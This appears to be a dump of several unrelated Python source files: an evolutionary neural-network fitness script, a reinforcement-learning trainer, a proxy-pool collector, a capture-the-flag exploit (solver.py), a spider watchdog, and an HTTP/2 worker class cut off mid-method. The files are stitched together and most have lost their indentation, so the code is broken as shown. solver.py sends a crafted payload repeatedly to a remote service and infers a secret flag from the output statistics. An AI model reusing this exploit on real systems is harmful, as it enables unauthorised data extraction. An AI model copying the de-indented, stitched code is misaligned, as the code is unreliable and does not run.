#test_fitness = NN_DE.set_weights_to_keras_model_and_compute_fitness(self, pop=self.population,
# data=self.test_dataset, nn_model=self.model)
r_NNDE['champion weights'] = NN_DE.convert_vector_weights(self, self.population[best_idx], self.model)
r_NNDE['model'] = self.model
r_NNDE['best index'] = best_idx
r_NNDE['Best NN'] = fitness[best_idx]
r_NNDE['train_fitness'] = fitness
r_NNDE['test_fitness'] = test_fitness
        r_NNDE['population'] = self.population
return r_NNDE
if __name__ == '__main__':
data = np.load('data17-18_13TeV.sgn_lhmedium_probes.EGAM2.bkg.vetolhvloose.EGAM7.samples.npz')
sgn = data['signalPatterns_etBin_2_etaBin_0']
bkg = data['backgroundPatterns_etBin_2_etaBin_0']
sgn_trgt = np.ones(sgn.shape[0])
bkg_trgt = -1*np.ones(bkg.shape[0])
sgn_normalized = np.zeros_like(sgn)
for ind in range(sgn.shape[0]):
sgn_normalized[ind] = sgn[ind]/np.abs(np.sum(sgn[ind]))
bkg_normalized = np.zeros_like(bkg)
for ind in range(bkg.shape[0]):
bkg_normalized[ind] = bkg[ind]/np.abs(np.sum(bkg[ind]))
data_ = np.append(sgn_normalized, bkg_normalized, axis=0)
trgt = np.append(sgn_trgt, bkg_trgt)
skf = StratifiedKFold(n_splits=10)
CVO = list(skf.split(data_, trgt))
import multiprocessing
import time
nn_de = NN_DE(n_pop=20, max_sp_evals=20, scheme='rand')
    def worker(proc_id, result_dict):
        print('Work Fold: '+ str(proc_id+1))
        train_index, test_index = CVO[proc_id]
        result_dict['Fold {}'.format(proc_id+1)] = nn_de.evolution(train_dataset=(data_[train_index], trgt[train_index]),
                                                                   test_dataset=(data_[test_index], trgt[test_index]))
inicio = time.time()
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for ifold in range(len(CVO)):
p = multiprocessing.Process(target=worker, args=(ifold,return_dict))
jobs.append(p)
p.start()
time.sleep(5)
for proc in jobs:
proc.join()
fim=time.time()
    print('Took {} seconds'.format(fim-inicio))
#import pickle
#with open('results_NNDE.2000SPevals.pickle', 'wb') as handle:
# pickle.dump(return_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
train.py
|
#!/usr/bin/env python3
import argparse
parser = argparse.ArgumentParser(description='Macro-DESPOT (MAGIC) Training Args')
parser.add_argument('--task', required=True,
help='Task')
parser.add_argument('--macro-length', type=int, required=True,
help='Macro-action length')
parser.add_argument('--num-env', type=int, default=16,
help='Number of environments (default: 16)')
parser.add_argument('--num-iterations', type=int, default=None)
parser.add_argument('--not-belief-dependent', dest='belief_dependent', default=True, action='store_false')
parser.add_argument('--not-context-dependent', dest='context_dependent', default=True, action='store_false')
parser.add_argument('--output-dir', required=False, default=None)
args = parser.parse_args()
import os
import sys
sys.path.append('{}/../'.format(os.path.dirname(os.path.realpath(__file__))))
from environment import Environment, Response
from models import MAGICGenNet, MAGICCriticNet, MAGICGenNet_DriveHard, MAGICCriticNet_DriveHard
from replay import ReplayBuffer
from utils import PARTICLE_SIZES, CONTEXT_SIZES
import cv2
import itertools
import multiprocessing
import numpy as np
import struct
import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import zmq
np.set_printoptions(precision=4, suppress=True)
torch.set_num_threads(1)
TASK = args.task
MACRO_LENGTH = args.macro_length
PARTICLE_SIZE = PARTICLE_SIZES[TASK] if TASK in PARTICLE_SIZES else None
CONTEXT_SIZE = CONTEXT_SIZES[TASK] if TASK in CONTEXT_SIZES else None
BELIEF_DEPENDENT = args.belief_dependent
CONTEXT_DEPENDENT = args.context_dependent
# Training configurations
REPLAY_MIN = 10000
REPLAY_MAX = 100000
REPLAY_SAMPLE_SIZE = 256
SAVE_INTERVAL = 5000 if TASK == 'DriveHard' else 10000
PRINT_INTERVAL = 100
RECENT_HISTORY_LENGTH = 50
OUTPUT_DIR = args.output_dir
SAVE_PATH = 'learned_{}_{}/'.format(TASK, MACRO_LENGTH)
NUM_ITERATIONS = args.num_iterations
NUM_CURVES = 8
if TASK in ['DriveHard']:
TARGET_ENTROPY = np.array([-1.0] * 14, dtype=np.float32)
LOG_ALPHA_INIT = [0.0] * 14
LR = 1e-4
elif TASK in ['PuckPush']:
TARGET_ENTROPY = [-5.0] * NUM_CURVES
LOG_ALPHA_INIT = [-1.0] * NUM_CURVES
LR = 1e-4
elif TASK in ['LightDark']:
TARGET_ENTROPY = [-5.0] * NUM_CURVES
LOG_ALPHA_INIT = [-3.0] * NUM_CURVES
LR = 1e-4
LOG_ALPHA_MIN = -10.
LOG_ALPHA_MAX = 20.
NUM_ENVIRONMENTS = args.num_env
ZMQ_ADDRESS = 'tcp://127.0.0.1'
def environment_process(port):
zmq_context = zmq.Context()
socket = zmq_context.socket(zmq.REQ)
socket.connect('{}:{}'.format(ZMQ_ADDRESS, port))
environment = Environment(TASK, MACRO_LENGTH, False)
steps = 0
total_reward = 0
while True:
# Read from environment.
context = environment.read_context()
#context = cv2.imdecode(context, cv2.IMREAD_UNCHANGED)[...,0:2]
state = environment.read_state()
# Call generator if needed.
if state is not None:
socket.send_pyobj((
'CALL_GENERATOR',
context,
state))
params = socket.recv_pyobj()
environment.write_params(params)
# Read response.
response = environment.process_response()
# Add experience.
if state is not None and response.best_value is not None:
socket.send_pyobj((
'ADD_EXPERIENCE',
context,
state,
params,
response.best_value))
socket.recv_pyobj()
# Add to trajectory statistics.
steps += response.steps
total_reward += response.undiscounted_reward
# Upload trajectory statistics.
if response.is_terminal:
collision = response.is_failure
socket.send_pyobj((
'ADD_TRAJECTORY_RESULT',
steps, total_reward, collision, response.stats))
socket.recv_pyobj()
steps = 0
total_reward = 0
def rand_macro_action_set(num_macros, macro_order):
x = np.random.normal(size=(num_macros, macro_order * 2))
x /= np.expand_dims(np.linalg.norm(x, axis=-1), axis=-1)
return x.reshape((num_macros * 2 * macro_order,)).astype(np.float32)
def rand_macro_action_set_drive_straight(num_macros):
x = np.random.uniform(-1.0, 1.0, (num_macros * 2,))
return x.astype(np.float32)
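# Both helpers above produce flat float32 parameter vectors that serve as a random
# fallback before the replay buffer reaches REPLAY_MIN; the first one normalises each
# macro-action's parameters onto the unit sphere before flattening.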
if __name__ == '__main__':
if OUTPUT_DIR is not None:
if not os.path.exists(OUTPUT_DIR):
try:
os.makedirs(OUTPUT_DIR)
            except OSError:  # the directory may already exist (e.g. created by another process)
pass
save_path = SAVE_PATH
if OUTPUT_DIR is not None:
save_path = OUTPUT_DIR + '/' + save_path
if not os.path.exists(save_path):
os.mkdir(save_path)
# Load models.
print('Loading models...')
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if TASK in ['DriveHard']:
gen_model = MAGICGenNet_DriveHard(MACRO_LENGTH, CONTEXT_DEPENDENT, BELIEF_DEPENDENT).float().to(device)
critic_model = MAGICCriticNet_DriveHard(MACRO_LENGTH, True, True).float().to(device)
else:
gen_model = MAGICGenNet(CONTEXT_SIZE, PARTICLE_SIZE, CONTEXT_DEPENDENT, BELIEF_DEPENDENT).float().to(device)
critic_model = MAGICCriticNet(CONTEXT_SIZE, PARTICLE_SIZE, True, True).float().to(device)
gen_model_optimizer = optim.Adam(gen_model.parameters(), lr=LR)
critic_model_optimizer = optim.Adam(critic_model.parameters(), lr=LR)
log_alpha = torch.tensor(LOG_ALPHA_INIT, requires_grad=True, device=device)
alpha_optim = optim.Adam([log_alpha], lr=LR)
# Prepare zmq server.
zmq_context = zmq.Context()
socket = zmq_context.socket(zmq.REP)
port = socket.bind_to_random_port(ZMQ_ADDRESS)
# Start processes.
print('Starting processes...')
processes = [multiprocessing.Process(target=environment_process, args=(port,), daemon=True) for i in range(NUM_ENVIRONMENTS)]
for p in processes:
p.start()
step = 0
start = time.time()
recent_steps = []
recent_total_reward = []
recent_collisions = []
recent_values = []
recent_stats = [[] for _ in range(5)]
replay_buffer = ReplayBuffer(REPLAY_MAX)
while True:
# Read request and process.
request = socket.recv_pyobj()
instruction = request[0]
instruction_data = request[1:]
if instruction == 'CALL_GENERATOR':
if len(replay_buffer) < REPLAY_MIN:
if TASK in ['DriveStraight', 'DriveHard']:
params = rand_macro_action_set_drive_straight(7)
else:
params = rand_macro_action_set(8, 3)
else:
with torch.no_grad():
(macro_actions, macro_actions_entropy) = gen_model.rsample(
torch.tensor(instruction_data[0], dtype=torch.float, device=device).unsqueeze(0),
torch.tensor(instruction_data[1], dtype=torch.float, device=device).unsqueeze(0))
params = macro_actions.squeeze(0).cpu().numpy()
socket.send_pyobj(params)
elif instruction == 'ADD_TRAJECTORY_RESULT':
socket.send_pyobj(0) # Return immediately.
recent_steps.append((instruction_data[0], instruction_data[2] > 0.5))
recent_total_reward.append(instruction_data[1])
recent_collisions.append(instruction_data[2])
recent_steps = recent_steps[-RECENT_HISTORY_LENGTH:]
recent_total_reward = recent_total_reward[-RECENT_HISTORY_LENGTH:]
recent_collisions = recent_collisions[-RECENT_HISTORY_LENGTH:]
for i in range(len(recent_stats)):
if instruction_data[3][i] is not None:
recent_stats[i].append(instruction_data[3][i])
recent_stats[i] = recent_stats[i][-RECENT_HISTORY_LENGTH:]
elif instruction == 'ADD_EXPERIENCE':
socket.send_pyobj(0) # Return immediately.
recent_values.append(instruction_data[3])
recent_values = recent_values[-RECENT_HISTORY_LENGTH:]
# Add to buffer.
instruction_data_cuda = [torch.tensor(t, dtype=torch.float, device=device) for t in instruction_data]
replay_buffer.append(instruction_data_cuda)
# Check for minimum replay size.
if len(replay_buffer) < REPLAY_MIN:
print('Waiting for minimum buffer size ... {}/{}'.format(len(replay_buffer), REPLAY_MIN))
continue
# Sample training mini-batch.
sampled_evaluations = replay_buffer.sample(REPLAY_SAMPLE_SIZE)
sampled_contexts = torch.stack([t[0] for t in sampled_evaluations])
sampled_states = torch.stack([t[1] for t in sampled_evaluations])
sampled_params = torch.stack([t[2] for t in sampled_evaluations])
sampled_values = torch.stack([t[3] for t in sampled_evaluations])
# Update critic.
critic_loss = torch.distributions.Normal(*critic_model(sampled_contexts, sampled_states, sampled_params)) \
.log_prob(sampled_values).mean(dim=-1)
critic_model_optimizer.zero_grad()
gen_model_optimizer.zero_grad()
(-critic_loss).backward()
torch.nn.utils.clip_grad_norm_(critic_model.parameters(), 1.0)
critic_model_optimizer.step()
# Update params model.
(macro_actions, macro_actions_entropy) = gen_model.rsample(sampled_contexts, sampled_states)
(value, sd) = critic_model(sampled_contexts, sampled_states, macro_actions)
critic_model_optimizer.zero_grad()
gen_model_optimizer.zero_grad()
dual_terms = (log_alpha.exp().detach() * macro_actions_entropy).sum(dim=-1)
gen_objective = value + dual_terms
(-gen_objective.mean()).backward()
torch.nn.utils.clip_grad_norm_(gen_model.parameters(), 1.0)
gen_model_optimizer.step()
# Update dual variables.
alpha_optim.zero_grad()
alpha_loss = log_alpha * ((macro_actions_entropy - torch.tensor(
TARGET_ENTROPY, device=device, dtype=torch.float32)).detach())
alpha_loss.mean().backward()
with torch.no_grad():
log_alpha.grad *= (((-log_alpha.grad >= 0) | (log_alpha >= LOG_ALPHA_MIN)) &
((-log_alpha.grad < 0) | (log_alpha <= LOG_ALPHA_MAX))).float()
alpha_optim.step()
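        # The masking above zeroes any gradient component that would push log_alpha
        # further below LOG_ALPHA_MIN or further above LOG_ALPHA_MAX, so the dual
        # variables stay clipped to the configured range after the optimizer step.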
# Log statistics.
if step % PRINT_INTERVAL == 0:
print("\033[H\033[J")
print('Step {}: Recent Steps (Pass) = {}'.format(step,
np.mean([s[0] for s in recent_steps if not s[1]]) if len([s[0] for s in recent_steps if not s[1]]) > 0 else None))
print('Step {}: Recent Steps (Fail) = {}'.format(step,
np.mean([s[0] for s in recent_steps if s[1]]) if len([s[0] for s in recent_steps if s[1]]) > 0 else None))
print('Step {}: Recent Total Reward = {}'.format(step, np.mean(recent_total_reward) if len(recent_total_reward) > 0 else None))
print('Step {}: Recent Collisions = {}'.format(step, np.mean(recent_collisions) if len(recent_collisions) > 0 else None))
            print('Step {}: Recent Values = {}'.format(step, np.mean(recent_values) if len(recent_values) > 0 else None))
print('Step {}: Critic Net Loss = {}'.format(step, critic_loss.detach().item()))
print('Step {}: Generator Mean = {}'.format(step, value.mean().detach().item()))
print('Step {}: Generator S.D. = {}'.format(step, sd.mean().detach().item()))
print('Step {}: Generator Curve Entropy = {}'.format(step, macro_actions_entropy.mean(dim=-2).detach().cpu().numpy()))
for i in range(5):
chained = list(itertools.chain.from_iterable(recent_stats[i]))
print('Step {}: Recent Stat{} = {}'.format(step, i, np.mean(chained) if len(chained) > 0 else None))
print('Step {}: Elapsed = {} m'.format(step, (time.time() - start) / 60))
print('Alpha = ', torch.exp(log_alpha))
# Save models.
if step % SAVE_INTERVAL == 0:
print('Saving models....')
torch.save(gen_model.state_dict(), save_path + 'gen_model.pt.{:08d}'.format(step))
torch.save(critic_model.state_dict(), save_path + 'critic_model.pt.{:08d}'.format(step))
if NUM_ITERATIONS is not None and step >= NUM_ITERATIONS:
for p in processes:
p.terminate()
p.join()
socket.close()
exit()
step += 1
|
main.py
|
# -*- coding: utf-8 -*-
# @Author: LogicJake
# @Date: 2019-01-16 11:25:12
# @Last Modified time: 2019-01-22 19:21:05
from config import logger
from lib.database import db_object
import argparse
from get_proxy import GetProxy
from validate import ValidateOrigin
from test import TestAvailable
import threading
def init(db_type):
db_obj = db_object.new_db(db_type)
db_obj.connect()
db_obj.create_required_tables()
num = db_obj.select('available', ['COUNT(*)'])
num = num[0][0]
logger.info('There are {} available proxies'.format(num))
logger.info('The proxy pool is initialized successfully')
db_obj.close()
def start(args):
db_type = args.database
init(db_type)
get_proxy = GetProxy(db_type)
validate_origin = ValidateOrigin(db_type)
test_available = TestAvailable(db_type)
    thread_get_proxy = threading.Thread(
        target=get_proxy.cycle_get, name="thread-get-ip")  # periodically fetch proxies from websites
    thread_validate_proxy = threading.Thread(
        target=validate_origin.cycle_validate, name="thread-validate-ip")  # periodically test which fetched proxies work
    thread_test_proxy = threading.Thread(
        target=test_available.cycle_test, name="Thread-test-ip")  # periodically re-check and drop unusable proxies
thread_get_proxy.start()
thread_validate_proxy.start()
thread_test_proxy.start()
def parse_args():
# Parses arguments
parser = argparse.ArgumentParser(
description="collect proxy from internet.")
parser.add_argument('--database', nargs='?', default='mysql', type=str)
return parser.parse_args()
if __name__ == '__main__':
args = parse_args()
start(args)
|
solver.py
|
#!/usr/bin/env python3
import os
import sys
import json
import math
import string
import socket
import subprocess
from threading import Thread
IP = sys.argv[1] if len(sys.argv) > 1 else '0.0.0.0'
PORT = 17171
def generate_payload():
operation = 'Ry ' + str(-math.pi / 2)
operations = []
for i in range(1, 8):
operations.extend([
'SWAP', str(i),
operation,
'SWAP', str(i),
])
return operation + ' ' + ' '.join(operations)
def get_remote_io():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect((IP, PORT))
file = sock.makefile('rwb')
return file, file
def get_local_io():
args = ['dotnet', './deploy/service/ZN.Runner.dll']
process = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return process.stdin, process.stdout
def send_payload(io, payload, repeat):
for _ in range(repeat):
io.write((payload + os.linesep).encode())
io.flush()
io.write(os.linesep.encode())
io.flush()
def read_output(io, repeat):
for i in range(repeat):
print('\rReading line... [ %d / %d ]' % (i + 1, repeat), end='')
line = io.readline().strip().replace(b'>>> ', b'')
if len(line) == 0:
break
yield line
print()
def calculate_counters(io, repeat):
bitsize = 8
payload = generate_payload()
fin, fout = io
thread = Thread(target=send_payload, args=(fin, payload, repeat), daemon=True)
thread.start()
counters = []
    for line in read_output(fout, repeat):
data = bytes.fromhex(line.decode())
for i, byte in enumerate(data):
bits = bin(byte)[2:].zfill(bitsize)
if len(counters) <= i:
counters.append([0] * bitsize)
for k, bit in enumerate(bits):
counters[i][k] += int(bit)
return counters
def write_local_flag(text):
filename = 'flag.txt'
with open(filename, 'w') as file:
file.write(text)
def construct_model(alphabet, repeat):
write_local_flag(alphabet)
counters = calculate_counters(get_local_io(), repeat)
return dict((symbol, counter) for symbol, counter in zip(alphabet, counters))
def save_model(model):
filename = 'model.json'
with open(filename, 'w') as file:
json.dump(model, file)
def load_model():
filename = 'model.json'
with open(filename, 'r') as file:
return json.load(file)
def counters_equal(counter1, counter2, eps):
for x, y in zip(counter1, counter2):
if abs(x - y) > eps:
return False
return True
def try_get_flag(model, counters, eps):
flag = []
for counter in counters:
symbols = []
for symbol in model:
if counters_equal(model[symbol], counter, eps):
symbols.append(symbol)
if len(symbols) != 1:
return None
flag.append(symbols[0])
return ''.join(flag)
def main():
repeat = 5000
alphabet = string.ascii_letters + string.digits + '{}_'
# model = construct_model(alphabet, repeat)
# save_model(model)
# print('Model saved')
# return
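    # Two-phase workflow (a sketch inferred from the commented lines above): first
    # uncomment construct_model/save_model and run against the local service to build
    # model.json, then rerun with load_model to match the remote counters below.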
model = load_model()
print('Model loaded')
counters = calculate_counters(get_remote_io(), repeat)
print('Counters loaded')
possible_flags = set()
for eps in range(1, repeat):
possible_flag = try_get_flag(model, counters, eps)
if possible_flag is not None:
possible_flags.add(possible_flag)
print(possible_flags)
if __name__ == '__main__':
main()
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/sinablog'
task_type = "sinablog"
def run_proc():
os.chdir(main_dir +"sinablog/sinablog/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
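# Usage (inferred from the argv handling above): python watchdog.py <pid> [<pid> ...]
# Each pid is a running spider process to watch; dead ones are restarted via run_proc().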
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
    except Exception:  # the process is gone; restart the spider
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
http2_connection.py
|
import Queue
import threading
import socket
import errno
import struct
from http_common import *
from hyper.common.bufsocket import BufferedSocket
from hyper.packages.hyperframe.frame import (
FRAMES, DataFrame, HeadersFrame, PushPromiseFrame, RstStreamFrame,
SettingsFrame, Frame, WindowUpdateFrame, GoAwayFrame, PingFrame,
BlockedFrame, FRAME_MAX_ALLOWED_LEN, FRAME_MAX_LEN
)
from http2_stream import Stream
from hyper.http20.window import BaseFlowControlManager
from hyper.packages.hpack import Encoder, Decoder
# this is defined in rfc7540
# default window size 64k
DEFAULT_WINDOW_SIZE = 65535
# default max frame is 16k, defined in rfc7540
DEFAULT_MAX_FRAME = FRAME_MAX_LEN
class FlowControlManager(BaseFlowControlManager):
"""
``hyper``'s default flow control manager.
This implements hyper's flow control algorithms. This algorithm attempts to
reduce the number of WINDOWUPDATE frames we send without blocking the remote
endpoint behind the flow control window.
This algorithm will become more complicated over time. In the current form,
the algorithm is very simple:
- When the flow control window gets less than 3/4 of the maximum size,
increment back to the maximum.
- Otherwise, if the flow control window gets to less than 1kB, increment
back to the maximum.
"""
def increase_window_size(self, frame_size):
future_window_size = self.window_size - frame_size
if ((future_window_size < (self.initial_window_size * 3 / 4)) or
(future_window_size < 1000)):
return self.initial_window_size - future_window_size
return 0
def blocked(self):
return self.initial_window_size - self.window_size
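# A rough worked example of the policy above (not part of hyper itself): with the
# default 64 KB window (65535 bytes), a 20000-byte frame leaves 45535 bytes, which
# is below 3/4 of 65535, so increase_window_size() returns 20000 and one
# WINDOW_UPDATE restores the window to its initial size.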
class RawFrame(object):
def __init__(self, dat):
self.dat = dat
def serialize(self):
return self.dat
def __repr__(self):
out_str = "{type}".format(type=type(self).__name__)
return out_str
class Http2Worker(HttpWorker):
version = "2"
def __init__(self, logger, ip_manager, config, ssl_sock, close_cb, retry_task_cb, idle_cb, log_debug_data):
super(Http2Worker, self).__init__(
logger, ip_manager, config, ssl_sock, close_cb, retry_task_cb, idle_cb, log_debug_data)
self.network_buffer_size = 65535
# Google http/2 time out is 4 mins.
self.ssl_sock.settimeout(240)
self._sock = BufferedSocket(ssl_sock, self.network_buffer_size)
self.next_stream_id = 1
self.streams = {}
self.last_ping_time = time.time()
self.continue_timeout = 0
# count ping not ACK
# increase when send ping
# decrease when recv ping ack
        # if this is not 0, don't accept new requests.
self.ping_on_way = 0
self.accept_task = False
# request_lock
self.request_lock = threading.Lock()
# all send frame must put to this queue
# then send by send_loop
# every frame put to this queue must allowed by stream window and connection window
# any data frame blocked by connection window should put to self.blocked_send_frames
self.send_queue = Queue.Queue()
self.encoder = Encoder()
self.decoder = Decoder()
# keep blocked data frame in this buffer
# which is allowed by stream window but blocked by connection window.
# They will be sent when connection window open
self.blocked_send_frames = []
# Values for the settings used on an HTTP/2 connection.
# will send to remote using Setting Frame
self.local_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: 16 * 1024 * 1024,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: 256 * 1024
}
self.local_connection_initial_windows = 32 * 1024 * 1024
self.local_window_manager = FlowControlManager(self.local_connection_initial_windows)
# changed by server, with SettingFrame
self.remote_settings = {
SettingsFrame.INITIAL_WINDOW_SIZE: DEFAULT_WINDOW_SIZE,
SettingsFrame.SETTINGS_MAX_FRAME_SIZE: DEFAULT_MAX_FRAME,
SettingsFrame.MAX_CONCURRENT_STREAMS: 100
}
#self.remote_window_size = DEFAULT_WINDOW_SIZE
self.remote_window_size = 32 * 1024 * 1024
# send Setting frame before accept task.
self._send_preamble()
threading.Thread(target=self.send_loop).start()
threading.Thread(target=self.recv_loop).start()
# export api
def request(self, task):
if not self.keep_running:
# race condition
self.retry_task_cb(task)
return
if len(self.streams) > self.config.http2_max_concurrent:
self.accept_task = False
task.set_state("h2_req")
self.request_task(task)
def encode_header(self, headers):
return self.encoder.encode(headers)
def request_task(self, task):
with self.request_lock:
# create stream to process task
stream_id = self.next_stream_id
# http/2 client use odd stream_id
self.next_stream_id += 2
stream = Stream(self.logger, self.config, self, self.ip, stream_id, task,
self._send_cb, self._close_stream_cb, self.encode_header, self.decoder,
FlowControlManager(self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]),
self.remote_settings[SettingsFrame.INITIAL_WINDOW_SIZE],
self.remote_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE])
self.streams[stream_id] = stream
stream.start_request()
def send_loop(self):
while self.keep_running:
frame = self.send_queue.get(True)
if not frame:
                # a None frame means exit
break
if self.config.http2_show_debug:
self.logger.debug("%s Send:%s", self.ip, str(frame))
data = frame.serialize()
try:
self._sock.send(data, flush=False)
# don't flush for small package
# reduce send api call
if self.send_queue._qsize():
continue
# wait for payload frame
time.sleep(0.01)
# combine header and payload in one tcp package.
if not self.send_queue._qsize():
self._sock.flush()
self.last_send_time = time.time()
except socket.error as e:
if e.errno not in (errno.EPIPE, errno.ECONNRESET):
self.logger.warn("%s http2 send fail:%r", self.ip, e)
else:
self.logger.exception("send error:%r", e)
self.close("send fail:%r" % e)
except Exception as e:
self.logger.debug("http2 %s send error:%r", self.ip, e)
self.close("send fail:%r" % e)
def recv_loop(self):
while self.keep_running:
try:
self._consume_single_frame()
except Exception as e:
self.logger.exception("recv fail:%r", e)
self.close("recv fail:%r" % e)
def get_rtt_rate(self):
return self.rtt + len(self.streams) * 3000
def close(self, reason="conn close"):
self.keep_running = False
self.accept_task = False
# Notify loop to exit
        # This function may be called from outside the http2 worker,
        # e.g. when gae_proxy finds that the appid or ip is wrong.
self.send_queue.put(None)
for stream in self.streams.values():
if stream.task.responsed:
                # the response has already been sent to the client,
                # so this task can't be retried
stream.close(reason=reason)
else:
self.retry_task_cb(stream.task)
self.streams = {}
super(Http2Worker, self).close(reason)
def send_ping(self):
p = PingFrame(0)
p.opaque_data = struct.pack("!d", time.time())
self.send_queue.put(p)
self.last_ping_time = time.time()
self.ping_on_way += 1
def _send_preamble(self):
self.send_queue.put(RawFrame(b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'))
f = SettingsFrame(0)
f.settings[SettingsFrame.ENABLE_PUSH] = 0
f.settings[SettingsFrame.INITIAL_WINDOW_SIZE] = self.local_settings[SettingsFrame.INITIAL_WINDOW_SIZE]
f.settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE] = self.local_settings[SettingsFrame.SETTINGS_MAX_FRAME_SIZE]
self._send_cb(f)
# update local connection windows size
f = WindowUpdateFrame(0)
f.window_increment = self.local_connection_initial_windows - DEFAULT_WINDOW_SIZE
self._send_cb(f)
def increase_remote_window_size(self, inc_size):
# check and send blocked frames if window allow
self.remote_window_size += inc_size
#self.logger.debug("%s increase send win:%d result:%d", self.ip, inc_size, self.remote_window_size)
while len(self.blocked_send_frames):
frame = self.blocked_send_frames[0]
if len(frame.data) > self.remote_window_size:
return
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
self.blocked_send_frames.pop(0)
if self.keep_running and \
self.accept_task == False and \
len(self.streams) < self.config.http2_max_concurrent and \
self.remote_window_size > 10000:
self.accept_task = True
self.idle_cb()
def _send_cb(self, frame):
# can called by stream
# put to send_blocked if connection window not allow,
if frame.type == DataFrame.type:
if len(frame.data) > self.remote_window_size:
self.blocked_send_frames.append(frame)
self.accept_task = False
return
else:
self.remote_window_size -= len(frame.data)
self.send_queue.put(frame)
else:
self.send_queue.put(frame)
def _close_stream_cb(self, stream_id, reason):
# call by stream to remove from streams list
# self.logger.debug("%s close stream:%d %s", self.ssl_sock.ip, stream_id, reason)
try:
del self.streams[stream_id]
except KeyError:
pass
if self.keep_running and \
len(self.streams) < self.config.http2_max_concurrent and \
self.remote_window_size > 10000:
self.accept_task = True
self.idle_cb()
self.processed_tasks += 1
def _consume_single_frame(self):
try:
header = self._sock.recv(9)
except Exception as e:
self.logger.debug("%s _consume_single_frame:%r, inactive time:%d", self.ip, e, time.time() - self.last_recv_time)
self.close("ConnectionReset:%r" % e)
return
self.last_recv_time = time.time()
# Parse the header. We can use the returned memoryview directly here.
frame, length = Frame.parse_frame_header(header)
if length > FRAME_MAX_ALLOWED_LEN:
self.logger.error("%s Frame size exceeded on stream %d (received: %d, max: %d)",
                              self.ip, frame.stream_id, length, FRAME_MAX_ALLOWED_LEN)
# self._send_rst_frame(frame.stream_id, 6) # 6 = FRAME_SIZE_ERROR
try:
data = self._recv_payload(length)
except Exception as e:
self.close("ConnectionReset:%r" % e)
return
self._consume_frame_payload(frame, data)
def _recv_payload(self, length):
if not length:
return memoryview(b'')
buffer = bytearray(length)
buffer_view = memoryview(buffer)
index = 0
data_length = -1
        # _sock.recv(length) might not read out all the data if the given length
        # is very large, so we read from the socket repeatedly.
while length and data_length:
data = self._sock.recv(length)
self.last_recv_time = time.time()
data_length = len(data)
end = index + data_length
buffer_view[index:end] = data[:]
length -= data_length
index = end
return buffer_view[:end]
def _consume_frame_payload(self, frame, data):
frame.parse_body(data)
if self.config.http2_show_debug:
self.logger.debug("%s Recv:%s", self.ip, str(frame))
# Maintain our flow control window. We do this by delegating to the
# chosen WindowManager.
if frame.type == DataFrame.type:
size = frame.flow_controlled_length
increment = self.local_window_manager._handle_frame(size)
if increment < 0:
self.logger.warn("increment:%d", increment)
elif increment:
#self.logger.debug("%s frame size:%d increase win:%d", self.ip, size, increment)
w = WindowUpdateFrame(0)
w.window_increment = increment
self._send_cb(w)
elif frame.type == PushPromiseFrame.type:
self.logger.error("%s receive push frame", self.ip,)
# Work out to whom this frame should go.
if frame.stream_id != 0:
try:
stream = self.streams[frame.stream_id]
stream.receive_frame(frame)
except KeyError as e:
if frame.type not in [WindowUpdateFrame.type]:
self.logger.exception("%s Unexpected stream identifier %d, frame.type:%s e:%r",
self.ip, frame.stream_id, frame, e)
else:
self.receive_frame(frame)
def receive_frame(self, frame):
if frame.type == WindowUpdateFrame.type:
# self.logger.debug("WindowUpdateFrame %d", frame.window_increment)
self.increase_remote_window_size(frame.window_increment)
elif frame.type == PingFrame.type:
if 'ACK' in frame.flags:
ping_time = struct.unpack("!d", frame.opaque_data)[0]
time_now = time.time()
rtt = (time_now - ping_time) * 1000
if rtt < 0:
self.logger.error("rtt:%f ping_time:%f now:%f", rtt, ping_time, time_now)
self.rtt = rtt
self.ping_on_way -= 1
#self.logger.debug("RTT:%d, on_way:%d", self.rtt, self.ping_on_way)
if self.keep_running and self.ping_on_way == 0:
self.accept_task = True
else:
# The spec requires us to reply with PING+ACK and identical data.
p = PingFrame(0)
p.flags.add('ACK')
p.opaque_data = frame.opaque_data
self._send_cb(p)
elif frame.type == SettingsFrame.type:
if 'ACK' not in frame.flags:
# send ACK as soon as possible
f = SettingsFrame(0)
f.flags.add('ACK')
self._send_cb(f)
# this may trigger send DataFrame blocked by remote window
self._update_settings(frame)
else:
self.accept_task = True
self.idle_cb()
elif frame.type == GoAwayFrame.type:
